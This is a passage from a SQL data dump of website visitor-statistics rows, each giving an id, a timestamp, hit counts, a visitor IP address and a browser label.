,0,0,'66.249.70.69','chrome'),(509814,1590821940,1,1,0,0,'207.46.13.181','other'),(509815,1590822005,1,1,0,0,'66.249.70.72','chrome'),(509816,1590822052,8,8,0,0,'77.120.98.235','other'),(509817,1590822062,1,1,0,0,'66.249.70.70','chrome'),(509818,1590822389,1,0,1,0,'66.249.70.69',''),(509819,1590822395,1,1,0,0,'157.55.39.58','other'),(509820,1590823006,1,1,0,0,'131.220.6.152','chrome'),(509821,1590823339,2,2,0,0,'66.249.70.72','chrome'),(509822,1590823550,1,1,0,0,'66.249.64.33','chrome'),(509823,1590824241,1,1,0,0,'66.249.70.70','chrome'),(509824,1590824405,8,8,0,0,'77.120.98.235','other'),(509825,1590824505,1,1,0,0,'207.46.13.181','other'),(509826,1590825320,1,1,0,0,'91.196.178.170','chrome'),(509827,1590825824,1,1,0,0,'66.249.70.72','chrome'),(509828,1590826742,1,1,0,0,'91.196.178.22','chrome'),(509829,1590826751,8,8,0,0,'77.120.98.235','other'),(509830,1590827455,1,1,0,0,'66.249.64.33','chrome'),(509831,1590827877,1,1,0,0,'66.249.64.36','chrome'),(509832,1590827897,1,1,0,0,'66.249.70.72','chrome'),(509833,1590829465,1,1,0,0,'157.55.39.58','other'),(509834,1590829891,1,1,0,0,'109.252.20.46','chrome'),(509835,1590829912,1,1,0,0,'178.154.200.222','other'),(509836,1590830261,1,1,0,0,'8.29.198.27','other'),(509837,1590830489,1,1,0,0,'8.29.198.25','other'),(509838,1590830507,1,1,0,0,'66.249.70.70','chrome'),(509839,1590830777,8,8,0,0,'77.120.98.235','other'),(509840,1590831183,1,1,0,0,'207.46.13.181','other'),(509841,1590831188,2,2,0,0,'66.249.70.69','chrome'),(509842,1590831228,1,1,0,0,'178.154.200.222','other'),(509843,1590831575,1,0,1,0,'66.249.70.72',''),(509844,1590831726,1,1,0,0,'2.47.39.223','other'),(509845,1590833108,8,8,0,0,'77.120.98.235','other'),(509846,1590833271,1,1,0,0,'157.55.39.60','other'),(509847,1590833735,1,1,0,0,'130.180.219.244','chrome'),(509848,1590834005,1,1,0,0,'37.73.106.127','chrome'),(509849,1590835036,1,1,0,0,'66.249.70.69','chrome'),(509850,1590835333,1,1,0,0,'66.249.64.36','chrome'),(509851,1590835427,8,8,0,0,'77.120.98.235','other'),(509852,1590835440,1,1,0,0,'37.73.178.212','other'),(509853,1590835476,1,1,0,0,'109.74.154.72','chrome'),(509854,1590835792,1,1,0,0,'91.196.178.169','chrome'),(509855,1590835967,2,2,0,0,'66.249.70.72','chrome'),(509856,1590836668,2,2,0,0,'154.94.92.166','chrome'),(509857,1590836727,1,1,0,0,'154.94.92.30','chrome'),(509858,1590836798,2,2,0,0,'154.94.92.18','chrome'),(509859,1590836813,2,2,0,0,'154.95.243.62','chrome'),(509860,1590836822,2,2,0,0,'154.90.68.82','chrome'),(509861,1590836840,2,2,0,0,'45.199.109.158','chrome'),(509862,1590837099,1,1,0,0,'66.249.70.72','chrome'),(509863,1590837166,1,1,0,0,'154.85.189.222','chrome'),(509864,1590837790,2,1,1,0,'66.249.70.70',''),(509865,1590838033,8,8,0,0,'77.120.98.235','other'),(509866,1590838058,1,1,0,0,'66.249.70.70','chrome'),(509867,1590838237,2,2,0,0,'154.95.243.62','chrome'),(509868,1590838367,1,1,0,0,'5.9.61.101','other'),(509869,1590838381,2,2,0,0,'154.83.102.246','chrome'),(509870,1590838385,1,1,0,0,'45.199.109.122','chrome'),(509872,1590838471,1,1,0,0,'154.86.202.226','chrome'),(509873,1590838513,1,1,0,0,'154.90.68.62','chrome'),(509874,1590838522,2,2,0,0,'45.199.109.206','chrome'),(509875,1590838546,1,1,0,0,'154.94.92.62','chrome'),(509876,1590838549,2,2,0,0,'154.208.251.34','chrome'),(509877,1590839185,2,2,0,0,'154.85.189.222','chrome'),(509878,1590839402,2,2,0,0,'66.249.70.70','chrome'),(509879,1590839853,1,1,0,0,'66.249.70.72','chrome'),(509880,1590839882,1,1,0,0,'66.249.70.69','chrome'),(509881,1590840049,1,1,0,0,'154.90.68.66','chrome'),(509882,1590840175,2,2,0,0,'154.85.189.222','chrome'),(509883,1590840212,2,2,0,0,'154.90.68.54','chrome'),(509884,1590840253,2,2,0,0,'154.208.251.66','chrome'),(509885,1590840290,2,2,0,0,'45.199.109.206','chrome'),(509886,1590840328,1,1,0,0,'67.227.152.219','chrome'),(509887,1590840850,1,1,0,0,'37.54.19.123','other'),(509888,1590840894,8,8,0,0,'77.120.98.235','other'),(509889,1590841103,1,1,0,0,'8.29.198.26','other'),(509890,1590841323,1,1,0,0,'8.29.198.27','other'),(509891,1590841714,1,1,0,0,'66.249.70.70','chrome'),(509892,1590841841,1,1,0,0,'45.199.109.202','chrome'),(509893,1590841919,3,3,0,0,'162.243.173.212','chrome'),(509894,1590842040,1,1,0,0,'154.94.92.30','chrome'),(509895,1590842047,1,1,0,0,'207.46.13.181','other'),(509896,1590842089,4,4,0,0,'154.94.92.18','chrome'),(509897,1590842269,1,1,0,0,'154.208.251.66','chrome'),(509898,1590842649,1,1,0,0,'66.249.70.72','chrome'),(509899,1590842749,1,1,0,0,'45.194.128.14','chrome'),(509900,1590843116,1,1,0,0,'66.249.64.33','chrome'),(509901,1590843376,1,1,0,0,'66.249.70.70','chrome'),(509902,1590843433,1,1,0,0,'185.179.24.38','chrome'),(509903,1590843476,1,1,0,0,'154.94.88.206','chrome'),(509904,1590843574,3,3,0,0,'151.106.58.230','chrome'),(509905,1590843685,8,8,0,0,'77.120.98.235','other'),(509906,1590843707,2,2,0,0,'192.198.92.114','chrome'),(509907,1590843770,2,2,0,0,'131.153.37.2','chrome'),(509908,1590843836,1,1,0,0,'66.249.64.36','chrome'),(509909,1590843938,1,1,0,0,'94.182.186.80','chrome'),(509910,1590843988,1,1,0,0,'45.199.109.170','chrome'),(509911,1590844065,1,1,0,0,'157.55.39.58','other'),(509912,1590844259,1,1,0,0,'77.245.149.11','chrome'),(509913,1590844367,2,2,0,0,'154.85.189.222','chrome'),(509914,1590844583,1,1,0,0,'66.249.64.33','chrome'),(509915,1590844984,2,2,0,0,'154.208.251.54','chrome'),(509916,1590845017,1,1,0,0,'91.196.178.21','chrome'),(509917,1590845313,2,2,0,0,'154.80.252.78','chrome'),(509918,1590845340,3,3,0,0,'154.90.68.150','chrome'),(509919,1590845504,1,1,0,0,'110.232.141.83','chrome'),(509920,1590845833,1,1,0,0,'207.46.13.181','other'),(509921,1590846582,8,8,0,0,'77.120.98.235','other'),(509922,1590846995,1,1,0,0,'132.148.29.143','chrome'),(509923,1590847093,3,3,0,0,'45.199.109.58','chrome'),(509924,1590847113,2,2,0,0,'154.208.251.66','chrome'),(509925,1590847126,2,2,0,0,'154.90.68.82','chrome'),(509926,1590847338,3,3,0,0,'154.90.68.58','chrome'),(509927,1590847362,1,1,0,0,'156.238.90.66','chrome'),(509928,1590847469,2,2,0,0,'154.90.68.162','chrome'),(509929,1590847652,2,2,0,0,'77.245.149.11','chrome'),(509930,1590847774,1,1,0,0,'157.55.39.58','other'),(509931,1590848432,2,2,0,0,'67.227.152.219','chrome'),(509932,1590848740,3,3,0,0,'66.249.70.70','chrome'),(509933,1590848750,2,2,0,0,'162.241.5.177','chrome'),(509934,1590848878,2,2,0,0,'45.199.109.122','chrome'),(509935,1590848942,2,2,0,0,'154.208.109.22','chrome'),(509936,1590849048,2,2,0,0,'154.208.251.26','chrome'),(509937,1590849423,8,8,0,0,'77.120.98.235','other'),(509938,1590849697,1,1,0,0,'45.34.219.130','chrome'),(509939,1590849979,2,2,0,0,'66.249.70.69','chrome'),(509940,1590850317,1,1,0,0,'154.94.88.206','chrome'),(509941,1590850323,1,1,0,0,'162.241.224.125','chrome'),(509942,1590850487,2,2,0,0,'154.208.251.26','chrome'),(509943,1590850543,2,2,0,0,'154.94.92.62','chrome'),(509944,1590850583,2,2,0,0,'45.199.109.170','chrome'),(509945,1590850650,2,2,0,0,'178.154.200.222','other'),(509946,1590850751,2,2,0,0,'45.199.109.138','chrome'),(509947,1590850769,2,2,0,0,'185.98.128.25','chrome'),(509948,1590850806,1,1,0,0,'45.194.128.14','chrome'),(509949,1590851006,3,3,0,0,'66.249.70.72','chrome'),(509950,1590851928,2,2,0,0,'8.29.198.27','other'),(509951,1590852344,8,8,0,0,'77.120.98.235','other'),(509952,1590852495,1,1,0,0,'66.249.70.72','chrome'),(509953,1590852654,1,1,0,0,'157.55.39.180','other'),(509954,1590852745,3,3,0,0,'66.249.70.69','chrome'),(509955,1590853024,1,1,0,0,'45.199.109.134','chrome'),(509956,1590853448,3,3,0,0,'154.208.251.82','chrome'),(509957,1590853501,1,1,0,0,'192.198.92.114','chrome'),(509958,1590853571,1,1,0,0,'45.199.109.126','chrome'),(509959,1590853580,2,2,0,0,'45.199.109.158','chrome'),(509960,1590853587,1,1,0,0,'157.55.39.180','other'),(509961,1590853924,1,1,0,0,'66.249.70.70','chrome'),(509962,1590854139,2,2,0,0,'154.90.68.226','chrome'),(509963,1590854238,1,1,0,0,'17.58.99.7','other'),(509964,1590854613,1,1,0,0,'178.154.200.222','other'),(509965,1590854614,1,1,0,0,'66.249.64.33','chrome'),(509966,1590854615,1,1,0,0,'157.55.39.58','other'),(509967,1590854731,1,1,0,0,'207.46.13.181','other'),(509968,1590854893,1,1,0,0,'66.249.70.70','chrome'),(509969,1590855009,1,1,0,0,'178.154.200.22','other'),(509970,1590855126,8,8,0,0,'77.120.98.235','other'),(509971,1590855370,2,2,0,0,'45.199.109.202','chrome'),(509972,1590855377,1,1,0,0,'45.199.109.142','chrome'),(509973,1590855388,2,2,0,0,'62.233.120.26','chrome'),(509974,1590855391,1,1,0,0,'45.199.109.170','chrome'),(509975,1590855435,1,1,0,0,'154.90.68.150','chrome'),(509976,1590855460,2,2,0,0,'45.199.109.138','chrome'),(509977,1590855660,1,1,0,0,'154.90.68.66','chrome'),(509978,1590855670,1,1,0,0,'45.199.109.134','chrome'),(509979,1590856118,1,1,0,0,'91.227.28.120','chrome'),(509980,1590856285,1,1,0,0,'66.249.70.69','chrome'),(509981,1590856610,2,2,0,0,'66.249.70.72','chrome'),(509982,1590856660,1,1,0,0,'154.85.189.222','chrome'),(509983,1590856767,1,1,0,0,'154.86.202.226','chrome'),(509984,1590856966,1,1,0,0,'178.154.200.222','other'),(509985,1590857223,2,2,0,0,'154.90.68.58','chrome'),(509986,1590857458,4,4,0,0,'154.90.68.62','chrome'),(509987,1590857463,1,1,0,0,'45.199.109.134','chrome'),(509988,1590857470,1,1,0,0,'185.179.24.38','chrome'),(509989,1590857598,1,1,0,0,'66.249.64.38','chrome'),(509990,1590857752,1,1,0,0,'66.249.70.72','chrome'),(509991,1590857790,1,1,0,0,'66.249.70.69','chrome'),(509992,1590857809,1,1,0,0,'66.249.64.33','chrome'),(509993,1590857876,1,1,0,0,'66.249.70.70','chrome'),(509994,1590858065,8,8,0,0,'77.120.98.235','other'),(509995,1590858660,1,1,0,0,'173.230.251.210','chrome'),(509996,1590858732,4,4,0,0,'154.90.68.62','chrome'),(509997,1590858748,1,1,0,0,'154.90.68.150','chrome'),(509998,1590858773,1,1,0,0,'107.165.35.82','chrome'),(509999,1590858857,2,2,0,0,'132.148.251.230','chrome'),(510000,1590858868,2,2,0,0,'45.199.109.134','chrome'),(510001,1590859088,1,1,0,0,'66.249.70.72','chrome'),(510002,1590859211,2,2,0,0,'154.94.92.30','chrome'),(510003,1590859323,1,1,0,0,'178.208.83.7','chrome'),(510004,1590859690,4,4,0,0,'66.249.70.69','chrome'),(510005,1590859963,1,1,0,0,'156.230.20.152','chrome'),(510006,1590859986,3,3,0,0,'66.249.70.70','chrome'),(510007,1590860135,1,1,0,0,'107.165.35.82','chrome'),(510008,1590860317,2,2,0,0,'156.238.90.66','chrome'),(510009,1590860380,2,2,0,0,'45.199.109.142','chrome'),(510010,1590860494,1,1,0,0,'209.99.16.15','chrome'),(510011,1590860592,2,2,0,0,'154.94.92.174','chrome'),(510012,1590860618,1,1,0,0,'154.81.86.238','chrome'),(510013,1590860720,1,1,0,0,'209.205.201.162','chrome'),(510014,1590861097,8,8,0,0,'77.120.98.235','other'),(510015,1590862073,2,2,0,0,'66.249.70.69','chrome'),(510016,1590862116,3,2,1,0,'66.249.70.72',''),(510017,1590862252,2,2,0,0,'154.90.68.54','chrome'),(510018,1590862756,1,1,0,0,'8.29.198.26','other'),(510019,1590862787,5,5,0,0,'66.249.70.70','chrome'),(510020,1590862898,1,1,0,0,'213.180.203.16','other'),(510021,1590862987,1,1,0,0,'8.29.198.27','other'),(510022,1590863009,4,4,0,0,'66.249.70.69','chrome'),(510023,1590863081,1,1,0,0,'85.93.145.225','chrome'),(510024,1590864032,4,4,0,0,'66.249.70.72','chrome'),(510025,1590864144,8,8,0,0,'77.120.98.235','other'),(510026,1590864176,1,1,0,0,'45.77.181.73','chrome'),(510027,1590864663,1,1,0,0,'66.249.64.38','chrome'),(510028,1590864703,1,1,0,0,'66.249.64.33','chrome'),(510029,1590864946,1,1,0,0,'213.180.203.16','other'),(510030,1590864999,1,1,0,0,'178.154.200.222','other'),(510031,1590865280,1,1,0,0,'66.249.70.70','chrome'),(510032,1590865731,1,1,0,0,'66.249.70.72','chrome'),(510033,1590866964,1,1,0,0,'178.154.200.222','other'),(510034,1590866988,2,2,0,0,'157.55.39.180','other'),(510035,1590867129,8,8,0,0,'77.120.98.235','other'),(510036,1590867179,1,1,0,0,'66.249.70.70','chrome'),(510037,1590867305,1,1,0,0,'66.249.70.72','chrome'),(510038,1590868409,1,1,0,0,'66.249.64.36','chrome'),(510039,1590868524,1,1,0,0,'66.249.70.70','chrome'),(510040,1590868821,1,1,0,0,'66.249.70.69','chrome'),(510041,1590869810,2,2,0,0,'66.249.70.69','chrome'),(510042,1590869858,2,2,0,0,'66.249.64.38','chrome'),(510043,1590870013,1,1,0,0,'157.55.39.180','other'),(510044,1590870050,2,2,0,0,'66.249.70.70','chrome'),(510045,1590870152,8,8,0,0,'77.120.98.235','other'),(510046,1590870204,1,1,0,0,'207.46.13.181','other'),(510047,1590870350,1,1,0,0,'194.61.24.94','other'),(510048,1590870356,6,6,0,0,'3.231.220.225','other'),(510049,1590871362,6,6,0,0,'3.231.220.225','other'),(510050,1590871422,1,1,0,0,'178.154.200.222','other'),(510051,1590871451,3,2,1,0,'66.249.70.69',''),(510052,1590871796,1,1,0,0,'66.249.70.70','chrome'),(510053,1590871938,1,1,0,0,'207.46.13.181','other'),(510054,1590872329,6,6,0,0,'3.231.220.225','other'),(510055,1590872477,1,1,0,0,'66.249.70.69','chrome'),(510056,1590872528,1,1,0,0,'157.55.39.58','other'),(510057,1590873086,8,8,0,0,'77.120.98.235','other'),(510058,1590873282,5,5,0,0,'3.231.220.225','other'),(510059,1590873587,1,1,0,0,'8.29.198.26','other'),(510060,1590873716,4,3,1,0,'66.249.70.69',''),(510061,1590873778,1,1,0,0,'17.58.99.7','other'),(510062,1590873813,1,1,0,0,'8.29.198.27','other'),(510063,1590873845,1,1,0,0,'157.55.39.58','other'),(510064,1590873907,2,2,0,0,'66.249.70.72','chrome'),(510065,1590874521,1,1,0,0,'178.154.200.222','other'),(510066,1590874547,3,3,0,0,'3.231.220.225','other'),(510067,1590875653,10,10,0,0,'3.231.220.225','other'),(510068,1590875765,1,1,0,0,'66.249.70.72','chrome'),(510069,1590876024,2,2,0,0,'66.249.70.70','chrome'),(510070,1590876202,8,8,0,0,'77.120.98.235','other'),(510071,1590876340,1,1,0,0,'66.249.64.36','chrome'),(510072,1590876861,6,6,0,0,'3.231.220.225','other'),(510073,1590877204,3,3,0,0,'66.249.70.72','chrome'),(510074,1590877799,1,1,0,0,'66.249.64.33','chrome'),(510075,1590877825,1,1,0,0,'3.231.220.225','other'),(510076,1590877857,1,1,0,0,'66.249.70.69','chrome'),(510077,1590877977,1,1,0,0,'157.55.39.180','other'),(510078,1590878144,1,1,0,0,'157.55.39.58','other'),(510079,1590878735,3,3,0,0,'3.231.220.225','other'),(510080,1590878736,1,1,0,0,'213.180.203.16','other'),(510081,1590878960,1,1,0,0,'66.249.64.33','chrome'),(510082,1590879564,3,3,0,0,'66.249.70.69','chrome'),(510083,1590879612,1,1,0,0,'66.249.70.70','chrome'),(510084,1590879647,3,3,0,0,'157.55.39.58','other'),(510085,1590879800,8,8,0,0,'77.120.98.235','other'),(510086,1590879867,10,10,0,0,'3.231.220.225','other'),(510087,1590880169,1,1,0,0,'66.249.70.72','chrome'),(510088,1590882110,1,1,0,0,'213.180.203.140','other'),(510089,1590882415,1,1,0,0,'207.46.13.181','other'),(510090,1590882626,1,1,0,0,'66.249.70.72','chrome'),(510091,1590882779,1,1,0,0,'66.249.64.38','chrome'),(510092,1590882856,3,3,0,0,'66.249.70.70','chrome'),(510093,1590882906,1,1,0,0,'62.205.134.182','other'),(510094,1590883002,1,1,0,0,'13.58.128.98','chrome'),(510095,1590883126,2,2,0,0,'157.55.39.180','other'),(510096,1590883363,8,8,0,0,'77.120.98.235','other'),(510097,1590883925,1,1,0,0,'18.236.154.255','other'),(510098,1590883969,1,1,0,0,'66.249.64.38','chrome'),(510099,1590884413,1,1,0,0,'8.29.198.25','other'),(510100,1590884662,1,1,0,0,'8.29.198.27','other'),(510101,1590884691,1,1,0,0,'66.249.64.36','chrome'),(510102,1590884833,1,1,0,0,'66.249.70.72','chrome'),(510103,1590885657,2,2,0,0,'157.55.39.180','other'),(510104,1590885775,1,1,0,0,'178.154.200.222','other'),(510105,1590886780,1,1,0,0,'66.249.70.70','chrome'),(510106,1590886996,8,8,0,0,'77.120.98.235','other'),(510107,1590887204,1,1,0,0,'66.249.70.72','chrome'),(510108,1590887680,1,1,0,0,'207.46.13.181','other'),(510109,1590888163,1,1,0,0,'157.55.39.180','other'),(510110,1590888450,1,1,0,0,'66.249.70.69','chrome'),(510111,1590888584,1,1,0,0,'66.249.70.70','chrome'),(510112,1590888709,1,1,0,0,'66.249.70.72','chrome'),(510113,1590888858,1,1,0,0,'207.46.13.181','other'),(510114,1590889506,2,2,0,0,'157.55.39.58','other'),(510115,1590889534,1,1,0,0,'66.249.70.69','chrome'),(510116,1590889832,4,4,0,0,'66.249.70.70','chrome'),(510117,1590890128,1,1,0,0,'157.55.39.180','other'),(510118,1590890470,2,2,0,0,'66.249.70.72','chrome'),(510119,1590890904,1,1,0,0,'178.154.200.222','other'),(510120,1590890943,8,8,0,0,'77.120.98.235','other'),(510121,1590891189,1,1,0,0,'157.55.39.180','other'),(510122,1590892098,2,2,0,0,'66.249.70.72','chrome'),(510123,1590892144,1,1,0,0,'66.249.64.36','chrome'),(510124,1590893018,2,2,0,0,'66.249.70.69','chrome'),(510125,1590893046,2,2,0,0,'66.249.64.36','chrome'),(510126,1590893270,1,1,0,0,'91.209.11.236','other'),(510127,1590893402,1,1,0,0,'178.154.200.220','other'),(510128,1590893467,2,2,0,0,'157.55.39.58','other'),(510129,1590893584,1,1,0,0,'66.249.64.38','chrome'),(510130,1590893776,1,1,0,0,'66.249.70.70','chrome'),(510131,1590893884,1,1,0,0,'66.249.70.72','chrome'),(510132,1590894195,1,1,0,0,'157.55.39.180','other'),(510133,1590894471,1,1,0,0,'157.55.39.58','other'),(510134,1590894712,8,8,0,0,'77.120.98.235','other'),(510135,1590895237,2,2,0,0,'8.29.198.26','other'),(510136,1590895282,1,1,0,0,'66.249.64.33','chrome'),(510137,1590895283,1,1,0,0,'207.46.13.181','other'),(510138,1590895387,1,1,0,0,'178.154.200.222','other'),(510139,1590895521,1,1,0,0,'66.249.64.38','chrome'),(510140,1590895820,1,1,0,0,'66.249.70.69','chrome'),(510141,1590896628,1,1,0,0,'157.55.39.58','other'),(510142,1590896843,1,1,0,0,'157.55.39.180','other'),(510143,1590896872,3,3,0,0,'34.67.1.185','chrome'),(510144,1590896885,1,1,0,0,'66.249.70.69','chrome'),(510145,1590897015,3,3,0,0,'35.239.162.240','chrome'),(510146,1590897028,3,3,0,0,'104.154.208.58','chrome'),(510147,1590897047,3,3,0,0,'34.67.144.118','chrome'),(510148,1590897057,2,2,0,0,'35.202.27.189','chrome'),(510150,1590897067,2,2,0,0,'35.232.49.165','chrome'),(510152,1590898426,1,1,0,0,'178.154.200.220','other'),(510153,1590898457,1,1,0,0,'66.249.64.33','chrome'),(510154,1590898630,8,8,0,0,'77.120.98.235','other'),(510155,1590898691,2,2,0,0,'178.154.200.222','other'),(510156,1590898727,2,2,0,0,'66.249.70.72','chrome'),(510157,1590898746,1,1,0,0,'66.249.64.38','chrome'),(510158,1590899255,1,1,0,0,'66.249.64.36','chrome'),(510159,1590899451,1,1,0,0,'157.55.39.58','other'),(510160,1590900816,1,1,0,0,'62.205.134.182','other'),(510161,1590901507,1,1,0,0,'178.154.200.222','other'),(510162,1590902423,1,1,0,0,'66.249.70.69','chrome'),(510163,1590902470,2,2,0,0,'66.249.64.36','chrome'),(510164,1590902480,8,8,0,0,'77.120.98.235','other'),(510165,1590902742,1,1,0,0,'66.249.64.33','chrome'),(510166,1590902860,1,1,0,0,'213.180.203.16','other'),(510167,1590902949,1,1,0,0,'66.249.70.72','chrome'),(510168,1590902959,1,1,0,0,'66.249.70.70','chrome'),(510169,1590903909,2,2,0,0,'66.249.64.38','chrome'),(510170,1590904437,1,1,0,0,'66.249.70.69','chrome'),(510171,1590904446,1,1,0,0,'66.249.70.70','chrome'),(510172,1590904770,1,1,0,0,'31.13.127.117','other'),(510173,1590905347,2,0,2,0,'66.249.64.38',''),(510174,1590905369,1,1,0,0,'66.249.64.36','chrome'),(510175,1590905521,1,1,0,0,'66.249.70.70','chrome'),(510176,1590905601,1,1,0,0,'178.154.200.220','other'),(510177,1590906054,1,1,0,0,'8.29.198.27','other'),(510178,1590906080,2,2,0,0,'157.55.39.58','other'),(510179,1590906321,1,1,0,0,'8.29.198.25','other'),(510180,1590906469,1,1,0,0,'213.180.203.16','other'),(510181,1590906517,8,8,0,0,'77.120.98.235','other'),(510182,1590906596,1,1,0,0,'66.249.70.72','chrome'),(510183,1590906615,1,1,0,0,'66.249.70.69','chrome'),(510184,1590907684,1,1,0,0,'157.55.39.180','other'),(510185,1590908073,1,1,0,0,'66.249.64.33','chrome'),(510186,1590908180,1,1,0,0,'66.249.70.70','chrome'),(510187,1590908232,2,2,0,0,'66.249.70.72','chrome'),(510188,1590908361,3,3,0,0,'66.249.70.69','chrome'),(510189,1590909290,1,1,0,0,'66.102.9.169','chrome'),(510190,1590909355,1,0,1,0,'66.249.70.69',''),(510191,1590909548,1,1,0,0,'157.55.39.58','other'),(510192,1590909811,1,1,0,0,'66.249.70.69','chrome'),(510193,1590910031,1,1,0,0,'66.249.70.70','chrome'),(510194,1590910042,1,1,0,0,'157.55.39.180','other'),(510195,1590910475,1,1,0,0,'131.220.6.152','chrome'),(510196,1590910511,1,1,0,0,'66.249.70.72','chrome'),(510197,1590910650,8,8,0,0,'77.120.98.235','other'),(510198,1590911691,1,1,0,0,'66.249.70.72','chrome'),(510199,1590912727,1,1,0,0,'66.249.70.69','chrome'),(510200,1590913255,1,1,0,0,'66.249.70.72','chrome'),(510201,1590913627,2,2,0,0,'66.249.70.70','chrome'),(510202,1590913630,1,1,0,0,'66.249.70.69','chrome'),(510203,1590913849,1,1,0,0,'157.55.39.58','other'),(510204,1590915232,2,2,0,0,'66.249.70.72','chrome'),(510205,1590915473,2,2,0,0,'66.249.70.70','chrome'),(510206,1590916091,1,1,0,0,'157.55.39.58','other'),(510207,1590916272,8,8,0,0,'77.120.98.235','other'),(510208,1590916879,1,1,0,0,'8.29.198.26','other'),(510209,1590917144,1,1,0,0,'8.29.198.27','other'),(510210,1590917209,1,1,0,0,'66.249.64.38','chrome'),(510211,1590918062,2,2,0,0,'157.55.39.100','other'),(510212,1590918254,1,1,0,0,'66.249.64.38','chrome'),(510213,1590919070,1,1,0,0,'66.249.64.36','chrome'),(510214,1590919282,2,2,0,0,'66.249.64.33','chrome'),(510215,1590919397,1,1,0,0,'66.249.70.69','chrome'),(510216,1590920289,2,2,0,0,'66.249.70.70','chrome'),(510217,1590920301,8,8,0,0,'77.120.98.235','other'),(510218,1590921584,1,1,0,0,'66.249.70.72','chrome'),(510219,1590921931,1,1,0,0,'109.74.154.72','chrome'),(510220,1590922217,1,1,0,0,'66.249.70.70','chrome'),(510221,1590922707,1,1,0,0,'66.249.70.69','chrome'),(510222,1590922796,1,1,0,0,'66.249.70.72','chrome'),(510223,1590923472,1,1,0,0,'47.108.80.103','other'),(510224,1590924194,1,1,0,0,'66.249.70.70','chrome'),(510225,1590924203,1,1,0,0,'66.249.70.69','chrome'),(510226,1590924457,1,1,0,0,'66.249.70.72','chrome'),(510227,1590924587,1,1,0,0,'207.46.13.209','other'),(510228,1590925043,1,1,0,0,'66.249.64.38','chrome'),(510229,1590925249,1,1,0,0,'157.55.39.100','other'),(510230,1590925281,8,8,0,0,'77.120.98.235','other'),(510231,1590926631,4,4,0,0,'66.249.70.72','chrome'),(510232,1590926659,1,1,0,0,'66.249.70.69','chrome'),(510233,1590927508,8,8,0,0,'77.120.98.235','other'),(510234,1590927703,1,1,0,0,'8.29.198.25','other'),(510235,1590927964,1,1,0,0,'66.249.64.33','chrome'),(510236,1590927978,1,1,0,0,'8.29.198.27','other'),(510237,1590927983,1,1,0,0,'157.55.39.100','other'),(510238,1590929142,1,1,0,0,'157.55.39.100','other'),(510239,1590929477,1,1,0,0,'207.46.13.209','other'),(510240,1590929605,1,1,0,0,'157.55.39.218','other'),(510241,1590929979,8,8,0,0,'77.120.98.235','other'),(510242,1590930229,1,1,0,0,'66.249.64.38','chrome'),(510243,1590930373,1,1,0,0,'66.249.70.70','chrome'),(510244,1590931480,1,1,0,0,'66.249.70.69','chrome'),(510245,1590931543,1,1,0,0,'157.55.39.235','other'),(510246,1590931985,2,2,0,0,'66.249.70.72','chrome'),(510247,1590932155,1,1,0,0,'157.55.39.218','other'),(510248,1590932373,2,2,0,0,'157.55.39.100','other'),(510249,1590932374,8,8,0,0,'77.120.98.235','other'),(510250,1590932778,1,1,0,0,'157.55.39.235','other'),(510251,1590933715,1,0,1,0,'66.249.70.70',''),(510252,1590933805,1,1,0,0,'207.46.13.209','other'),(510253,1590934269,1,1,0,0,'66.249.64.36','chrome'),(510254,1590934490,1,1,0,0,'157.55.39.180','other'),(510255,1590934521,1,1,0,0,'157.55.39.235','other'),(510256,1590934677,8,8,0,0,'77.120.98.235','other'),(510257,1590935296,1,1,0,0,'66.249.70.69','chrome'),(510258,1590935413,2,2,0,0,'66.249.70.72','chrome'),(510259,1590935631,1,1,0,0,'66.249.70.70','chrome'),(510260,1590935634,1,1,0,0,'66.249.64.38','chrome'),(510261,1590935924,1,1,0,0,'17.58.99.7','other'),(510262,1590936226,1,1,0,0,'66.249.64.36','chrome'),(510263,1590937022,8,8,0,0,'77.120.98.235','other'),(510264,1590937464,1,1,0,0,'66.249.70.70','chrome'),(510265,1590937879,2,2,0,0,'157.55.39.235','other'),(510266,1590938193,1,1,0,0,'66.249.64.33','chrome'),(510267,1590938524,1,1,0,0,'8.29.198.26','other'),(510268,1590938815,1,1,0,0,'8.29.198.27','other'),(510269,1590939146,1,1,0,0,'207.46.13.209','other'),(510270,1590939323,8,8,0,0,'77.120.98.235','other'),(510271,1590939383,1,1,0,0,'66.249.70.69','chrome'),(510272,1590940535,1,1,0,0,'66.249.70.70','chrome'),(510273,1590940605,1,1,0,0,'157.55.39.8','other'),(510274,1590940967,1,1,0,0,'157.55.39.235','other'),(510275,1590941218,2,2,0,0,'207.46.13.209','other'),(510276,1590941599,1,1,0,0,'157.55.39.180','other'),(510277,1590941618,1,1,0,0,'157.55.39.8','other'),(510278,1590941624,8,8,0,0,'77.120.98.235','other'),(510279,1590942368,1,1,0,0,'66.249.70.72','chrome'),(510280,1590942531,1,1,0,0,'66.249.64.38','chrome'),(510281,1590942796,2,2,0,0,'66.249.70.70','chrome'),(510282,1590942975,1,1,0,0,'66.249.64.33','chrome'),(510283,1590943886,8,8,0,0,'77.120.98.235','other'),(510284,1590944016,2,2,0,0,'157.55.39.235','other'),(510285,1590944057,1,1,0,0,'66.249.70.70','chrome'),(510286,1590945397,1,1,0,0,'157.55.39.8','other'),(510287,1590946145,2,2,0,0,'157.55.39.235','other'),(510288,1590946162,8,8,0,0,'77.120.98.235','other'),(510289,1590946377,1,1,0,0,'173.252.111.9','other'),(510290,1590946378,1,1,0,0,'173.252.111.15','other'),(510291,1590946462,1,1,0,0,'66.249.70.69','chrome'),(510292,1590946829,1,1,0,0,'66.249.70.72','chrome'),(510293,1590946839,1,1,0,0,'66.249.70.70','chrome'),(510294,1590947617,1,1,0,0,'178.133.179.3','other'),(510295,1590947858,2,2,0,0,'207.46.13.209','other'),(510296,1590948096,1,1,0,0,'66.249.70.69','chrome'),(510297,1590948588,8,8,0,0,'77.120.98.235','other'),(510298,1590949104,1,1,0,0,'66.249.70.70','chrome'),(510299,1590949341,1,1,0,0,'194.61.24.94','other'),(510300,1590949346,1,1,0,0,'8.29.198.27','other'),(510301,1590949564,1,1,0,0,'66.249.70.72','chrome'),(510302,1590949585,1,1,0,0,'66.249.70.69','chrome'),(510303,1590949640,1,1,0,0,'8.29.198.26','other'),(510304,1590950563,1,1,0,0,'66.249.64.38','chrome'),(510305,1590950666,1,1,0,0,'207.46.13.209','other'),(510306,1590950946,1,1,0,0,'66.249.64.33','chrome'),(510307,1590950948,8,8,0,0,'77.120.98.235','other'),(510308,1590951465,1,1,0,0,'66.249.70.72','chrome'),(510309,1590951792,1,1,0,0,'207.46.13.146','other'),(510310,1590951829,1,1,0,0,'66.249.64.38','chrome'),(510311,1590952788,1,1,0,0,'157.55.39.235','other'),(510312,1590953347,8,8,0,0,'77.120.98.235','other'),(510313,1590953566,1,1,0